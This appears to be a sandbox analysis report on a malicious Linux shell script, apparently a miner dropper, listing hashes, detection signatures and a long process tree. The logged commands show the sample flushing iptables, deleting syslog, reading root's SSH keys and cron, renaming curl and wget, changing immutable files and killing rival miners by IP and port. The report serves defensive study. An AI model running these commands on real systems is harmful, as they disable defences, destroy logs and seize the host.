Analysis
-
max time kernel
150s -
max time network
10s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24-01-2025 04:09
Static task
static1
Behavioral task
behavioral1
Sample
196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
-
Size
37KB
-
MD5
d6648f420423f9dad4292a606f743c4b
-
SHA1
dcae47ec15e96274a39fcce4352077846ebf7b70
-
SHA256
196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910
-
SHA512
3820b4fb435732fef05157ff0713ed3a62269dc1c21240dbf7e2e59191a0f34050247573b4d9758cd84495fb28d8f346e381b8f09a9041c70ca88333b1303f93
-
SSDEEP
384:Q7pQQwQHDf6lpTWg3vM4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdUeUoJpJydIi:Q7xFNB48Fkc2zq0xvMGdl18r
Malware Config
Signatures
-
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 735 iptables -
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1339 xargs 1344 xargs 745 grep 872 xargs 926 xargs 1072 xargs 1241 xargs 760 xargs 877 xargs 1137 xargs 1163 xargs 1492 xargs 1103 xargs 766 xargs 826 xargs 1148 xargs 1294 xargs 1409 xargs 755 xargs 1201 xargs 1306 xargs 1349 xargs 1369 xargs 1221 xargs 1432 xargs 1189 xargs 1272 xargs 1497 xargs 907 xargs 986 xargs 1359 xargs 933 xargs 1117 xargs 1318 xargs 1427 xargs 1542 xargs 784 xargs 867 xargs 1279 xargs 1486 xargs 1421 xargs 921 xargs 966 xargs 1083 xargs 1088 xargs 1385 xargs 1300 xargs 883 xargs 1025 xargs 1093 xargs 1208 xargs 1266 xargs 838 xargs 999 xargs 1053 xargs 1444 xargs 808 xargs 849 xargs 1112 xargs 1391 xargs 1522 xargs 796 xargs 979 xargs 1060 xargs -
Enumerates running processes
Discovers information about currently running processes on the system
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online sysctl File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Process Discovery 1 TTPs 64 IoCs
Adversaries may try to discover information about running processes.
pid Process 891 ps 1230 ps 1428 ps 936 ps 1056 ps 1068 ps 1375 ps 1094 ps 1296 ps 1451 ps 1463 ps 1503 ps 897 ps 1197 ps 1355 ps 1433 ps 1498 ps 868 ps 1074 ps 1211 ps 845 ps 1204 ps 1330 ps 1410 ps 1028 ps 1191 ps 1302 ps 747 ps 873 ps 949 ps 969 ps 1365 ps 1445 ps 884 ps 1079 ps 1217 ps 1439 ps 1469 ps 1513 ps 744 ps 1223 ps 1282 ps 1422 ps 1113 ps 1164 ps 853 ps 858 ps 995 ps 1015 ps 1518 ps 955 ps 1256 ps 1319 ps 1475 ps 1123 ps 1159 ps 1325 ps 1386 ps 975 ps 942 ps 1249 ps 1172 ps 1178 ps 1493 ps -
description ioc Process File opened for reading /proc/1019/stat ps File opened for reading /proc/81/cmdline ps File opened for reading /proc/71/cmdline ps File opened for reading /proc/696/stat ps File opened for reading /proc/sys/kernel/osrelease ps File opened for reading /proc/675/status ps File opened for reading /proc/114/status ps File opened for reading /proc/74/status ps File opened for reading /proc/113/status ps File opened for reading /proc/82/cmdline ps File opened for reading /proc/74/stat ps File opened for reading /proc/37/status ps File opened for reading /proc/14/stat ps File opened for reading /proc/36/status ps File opened for reading /proc/15/cmdline ps File opened for reading /proc/104/cmdline ps File opened for reading /proc/8/status ps File opened for reading /proc/696/cmdline ps File opened for reading /proc/13/stat ps File opened for reading /proc/732/cmdline ps File opened for reading /proc/72/status ps File opened for reading /proc/1/cmdline ps File opened for reading /proc/385/stat ps File opened for reading /proc/512/cmdline ps File opened for reading /proc/17/status ps File opened for reading /proc/73/status ps File opened for reading /proc/1033/cmdline ps File opened for reading /proc/338/cmdline ps File opened for reading /proc/16/stat ps File opened for reading /proc/14/stat ps File opened for reading /proc/148/stat ps File opened for reading /proc/1/stat ps File opened for reading /proc/77/cmdline ps File opened for reading /proc/695/status ps File opened for reading /proc/36/cmdline ps File opened for reading /proc/1029/stat ps File opened for reading /proc/1390/cmdline ps File opened for reading /proc/36/status ps File opened for reading /proc/11/stat ps File opened for reading /proc/338/cmdline ps File opened for reading /proc/81/status ps File opened for reading /proc/511/stat ps File opened for reading /proc/512/cmdline ps File opened for reading /proc/694/stat ps File opened for reading /proc/165/stat ps File opened for reading /proc/114/status ps File opened for reading /proc/sys/kernel/osrelease ps File opened for reading /proc/3/status ps File opened for reading /proc/9/cmdline ps File opened for reading /proc/22/cmdline ps File opened for reading /proc/71/status ps File opened for reading /proc/385/status ps File opened for reading /proc/70/stat ps File opened for reading /proc/165/status ps File opened for reading /proc/148/cmdline ps File opened for reading /proc/2/cmdline ps File opened for reading /proc/375/cmdline ps File opened for reading /proc/76/status ps File opened for reading /proc/337/cmdline ps File opened for reading /proc/1/status ps File opened for reading /proc/2/stat ps File opened for reading /proc/12/stat ps File opened for reading /proc/385/status ps File opened for reading /proc/694/cmdline ps -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1076 grep 1106 grep 1352 grep -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/dev/null 196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
Processes
-
/tmp/196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh/tmp/196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh1⤵
- Writes file to tmp directory
PID:696 -
/usr/bin/curlcurl http://ip-api.com/json/2⤵PID:697
-
-
/bin/grepgrep -i CN2⤵PID:699
-
-
/bin/sedsed "s/,/\\n/g"2⤵PID:698
-
-
/bin/syncsync2⤵PID:720
-
-
/bin/catcat /var/spool/cron/2⤵PID:722
-
-
/bin/catcat /root/.ssh/authorized_keys2⤵PID:724
-
-
/bin/mvmv /usr/bin/curl /usr/bin/url2⤵PID:725
-
-
/bin/mvmv /usr/bin/url /usr/bin/cd12⤵PID:726
-
-
/bin/mvmv /usr/bin/wget /usr/bin/get2⤵PID:728
-
-
/bin/mvmv /usr/bin/get /usr/bin/wd12⤵PID:729
-
-
/bin/rmrm -rf /var/log/syslog2⤵PID:731
-
-
/usr/bin/chattrchattr -iua /tmp/2⤵PID:733
-
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵PID:734
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:735
-
-
/usr/sbin/userdeluserdel akay2⤵PID:739
-
-
/usr/sbin/userdeluserdel vfinder2⤵PID:740
-
-
/bin/rmrm -rf "/tmp/addres*"2⤵PID:741
-
-
/bin/rmrm -rf "/tmp/walle*"2⤵PID:742
-
-
/bin/rmrm -rf /tmp/keys2⤵PID:743
-
-
/bin/grepgrep -i "[a]liyun"2⤵
- Attempts to change immutable files
PID:745
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:744
-
-
/bin/grepgrep -i "[y]unjing"2⤵PID:748
-
-
/bin/psps aux2⤵
- Process Discovery
PID:747
-
-
/bin/rmrm -f /tmp/.null2⤵PID:749
-
-
/sbin/sysctlsysctl -w "vm.nr_hugepages=128"2⤵
- Reads CPU attributes
PID:750
-
-
/bin/grepgrep 185.71.65.2382⤵PID:752
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:754
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:753
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:755
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:758
-
-
/bin/grepgrep 140.82.52.872⤵PID:757
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:760
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:759
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:763
-
-
/bin/grepgrep :4432⤵PID:762
-
-
/bin/grepgrep -v -2⤵PID:765
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:766
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:764
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:769
-
-
/bin/grepgrep :232⤵PID:768
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:772
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:770
-
-
/bin/grepgrep -v -2⤵PID:771
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:776
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:775
-
-
/bin/grepgrep :4432⤵PID:774
-
-
/bin/grepgrep -v -2⤵PID:777
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:778
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:782
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:781
-
-
/bin/grepgrep :1432⤵PID:780
-
-
/bin/grepgrep -v -2⤵PID:783
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:784
-
-
/bin/grepgrep :22222⤵PID:786
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:787
-
-
/bin/grepgrep -v -2⤵PID:789
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:788
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:790
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:794
-
-
/bin/grepgrep :33332⤵PID:792
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:793
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:796
-
-
/bin/grepgrep -v -2⤵PID:795
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:800
-
-
/bin/grepgrep :33892⤵PID:798
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:802
-
-
/bin/grepgrep -v -2⤵PID:801
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:799
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:805
-
-
/bin/grepgrep :55552⤵PID:804
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:806
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:808
-
-
/bin/grepgrep -v -2⤵PID:807
-
-
/bin/grepgrep :66662⤵PID:810
-
-
/bin/grepgrep -v -2⤵PID:813
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:814
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:811
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:812
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:817
-
-
/bin/grepgrep :66652⤵PID:816
-
-
/bin/grepgrep -v -2⤵PID:819
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:818
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:820
-
-
/bin/grepgrep :66672⤵PID:822
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:824
-
-
/bin/grepgrep -v -2⤵PID:825
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:823
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:826
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:829
-
-
/bin/grepgrep :77772⤵PID:828
-
-
/bin/grepgrep -v -2⤵PID:831
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:832
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:830
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:835
-
-
/bin/grepgrep -v -2⤵PID:837
-
-
/bin/grepgrep :84442⤵PID:834
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:836
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:838
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:841
-
-
/bin/grepgrep -v -2⤵PID:843
-
-
/bin/grepgrep :33472⤵PID:840
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:844
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:842
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:849
-
-
/bin/grepgrep :33332⤵PID:847
-
-
/bin/grepgrep -v grep2⤵PID:846
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:848
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:845
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:856
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:857
-
-
/bin/psps aux2⤵
- Process Discovery
PID:853
-
-
/bin/grepgrep :55552⤵PID:855
-
-
/bin/grepgrep -v grep2⤵PID:854
-
-
/bin/grepgrep "kworker -c\\"2⤵PID:860
-
-
/bin/grepgrep -v grep2⤵PID:859
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:862
-
-
/bin/psps aux2⤵
- Process Discovery
PID:858
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:861
-
-
/bin/grepgrep -v grep2⤵PID:864
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:863
-
-
/bin/grepgrep log_2⤵PID:865
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:866
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:867
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:871
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:872
-
-
/bin/grepgrep -v grep2⤵PID:869
-
-
/bin/grepgrep systemten2⤵PID:870
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:868
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:876
-
-
/bin/grepgrep netns2⤵PID:875
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:877 -
/usr/local/sbin/killkill -9 103⤵PID:878
-
-
/usr/local/bin/killkill -9 103⤵PID:878
-
-
/usr/sbin/killkill -9 103⤵PID:878
-
-
/usr/bin/killkill -9 103⤵PID:878
-
-
/sbin/killkill -9 103⤵PID:878
-
-
/bin/killkill -9 103⤵PID:878
-
-
-
/bin/grepgrep -v grep2⤵PID:874
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:873
-
-
/bin/grepgrep voltuned2⤵PID:881
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:879
-
-
/bin/grepgrep -v grep2⤵PID:880
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:882
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:883
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:887
-
-
/bin/grepgrep darwin2⤵PID:886
-
-
/bin/grepgrep -v grep2⤵PID:885
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:888
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:884
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:894
-
-
/bin/grepgrep /tmp/dl2⤵PID:893
-
-
/bin/grepgrep -v grep2⤵PID:892
-
-
/bin/psps aux2⤵
- Process Discovery
PID:891
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:895
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:900
-
-
/bin/grepgrep /tmp/ddg2⤵PID:899
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:901
-
-
/bin/grepgrep -v grep2⤵PID:898
-
-
/bin/psps aux2⤵
- Process Discovery
PID:897
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:906
-
-
/bin/grepgrep /tmp/pprt2⤵PID:905
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:907
-
-
/bin/psps aux2⤵PID:903
-
-
/bin/grepgrep -v grep2⤵PID:904
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:913
-
-
/bin/grepgrep /tmp/ppol2⤵PID:912
-
-
/bin/grepgrep -v grep2⤵PID:911
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:914
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:910
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:921
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:920
-
-
/bin/grepgrep "/tmp/65ccE*"2⤵PID:919
-
-
/bin/grepgrep -v grep2⤵PID:918
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:917
-
-
/bin/grepgrep -v grep2⤵PID:923
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:926
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:922
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:925
-
-
/bin/grepgrep "/tmp/jmx*"2⤵PID:924
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:932
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:933
-
-
/bin/grepgrep -v grep2⤵PID:930
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:929
-
-
/bin/grepgrep "/tmp/2Ne80*"2⤵PID:931
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:939
-
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵PID:938
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:940
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:936
-
-
/bin/grepgrep -v grep2⤵PID:937
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:945
-
-
/bin/grepgrep -v grep2⤵PID:943
-
-
/bin/psps aux2⤵
- Process Discovery
PID:942
-
-
/bin/grepgrep 45.76.122.922⤵PID:944
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:946
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:952
-
-
/bin/grepgrep 51.38.191.1782⤵PID:951
-
-
/bin/grepgrep -v grep2⤵PID:950
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:953
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:949
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:958
-
-
/bin/grepgrep 51.15.56.1612⤵PID:957
-
-
/bin/grepgrep -v grep2⤵PID:956
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:959
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:955
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:965
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:966
-
-
/bin/grepgrep -v grep2⤵PID:963
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:962
-
-
/bin/grepgrep 86s.jpg2⤵PID:964
-
-
/bin/grepgrep aGTSGJJp2⤵PID:971
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:972
-
-
/bin/grepgrep -v grep2⤵PID:970
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:973
-
-
/bin/psps aux2⤵
- Process Discovery
PID:969
-
-
/bin/grepgrep nMrfmnRa2⤵PID:977
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:978
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:975
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:979
-
-
/bin/grepgrep -v grep2⤵PID:976
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:985
-
-
/bin/grepgrep PuNY5tm22⤵PID:984
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:986
-
-
/bin/grepgrep -v grep2⤵PID:983
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:982
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:991
-
-
/bin/grepgrep I0r8Jyyt2⤵PID:990
-
-
/bin/grepgrep -v grep2⤵PID:989
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:992
-
-
/bin/psps aux2⤵PID:988
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:998
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:999
-
-
/bin/grepgrep -v grep2⤵PID:996
-
-
/bin/grepgrep AgdgACUD2⤵PID:997
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:995
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1004
-
-
/bin/grepgrep -v grep2⤵PID:1002
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1005
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1001
-
-
/bin/grepgrep uiZvwxG82⤵PID:1003
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1010
-
-
/bin/grepgrep -v grep2⤵PID:1008
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1007
-
-
/bin/grepgrep hahwNEdB2⤵PID:1009
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1011
-
-
/bin/grepgrep -v grep2⤵PID:1016
-
-
/bin/grepgrep BtwXn5qH2⤵PID:1017
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1018
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1015
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1019
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1025
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1021
-
-
/bin/grepgrep 3XEzey2T2⤵PID:1023
-
-
/bin/grepgrep -v grep2⤵PID:1022
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1024
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1031
-
-
/bin/grepgrep t2tKrCSZ2⤵PID:1030
-
-
/bin/grepgrep -v grep2⤵PID:1029
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1032
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1028
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1040
-
-
/bin/grepgrep svc2⤵PID:1039
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1041
-
-
/bin/grepgrep -v grep2⤵PID:1038
-
-
/bin/psps aux2⤵PID:1037
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1045
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1046
-
-
/bin/grepgrep -v grep2⤵PID:1043
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1042
-
-
/bin/grepgrep HD7fcBgg2⤵PID:1044
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1052
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1053
-
-
/bin/grepgrep -v grep2⤵PID:1050
-
-
/bin/grepgrep zXcDajSs2⤵PID:1051
-
-
/bin/psps aux2⤵PID:1049
-
-
/bin/grepgrep 3lmigMo2⤵PID:1058
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1060
-
-
/bin/grepgrep -v grep2⤵PID:1057
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1056
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1059
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1065
-
-
/bin/grepgrep AkMK4A22⤵PID:1064
-
-
/bin/grepgrep -v grep2⤵PID:1063
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1066
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1062
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1071
-
-
/bin/grepgrep AJ2AkKe2⤵PID:1070
-
-
/bin/grepgrep -v grep2⤵PID:1069
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1068
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1072
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1077
-
-
/bin/grepgrep HiPxCJRS2⤵
- System Network Configuration Discovery
PID:1076
-
-
/bin/grepgrep -v grep2⤵PID:1075
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1078
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1074
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1083
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1079
-
-
/bin/grepgrep -v grep2⤵PID:1080
-
-
/bin/grepgrep http_0xCC0302⤵PID:1081
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1082
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1087
-
-
/bin/grepgrep http_0xCC0312⤵PID:1086
-
-
/bin/grepgrep -v grep2⤵PID:1085
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1084
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1088
-
-
